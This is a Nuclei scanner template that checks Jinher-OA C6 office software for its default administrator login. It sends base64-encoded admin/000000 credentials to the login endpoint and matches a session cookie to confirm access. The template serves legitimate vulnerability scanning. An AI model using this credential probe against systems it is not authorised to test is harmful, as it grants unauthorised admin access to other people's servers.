nuclei-templates/default-logins/jinher-oa-default-login.yaml

51 lines
1.2 KiB
YAML

id: jinher-oa-default-login
info:
name: Jinher-OA C6 - Default Admin Discovery
author: ritikchaddha
severity: high
description: Jinher-OA C6 default admin credentials were discovered.
reference:
- https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
tags: jinher,default-login
requests:
- raw:
- |
POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
type=login&loginCode={{base64("{{username}}")}}&pwd={{base64("{{password}}")}}&
attack: pitchfork
payloads:
username:
- admin
password:
- "000000"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\xcf\xb5\xcd\xb3\xb9\xdc\xc0\xed\xd4\xb1\x7c"
- "\xc4\xfa\xba\xc3\x7c\x7c\x7c"
condition: and
- type: word
part: header
words:
- "SessionIDAdmin="
- type: status
status:
- 200
# Enhanced by mp on 2022/07/15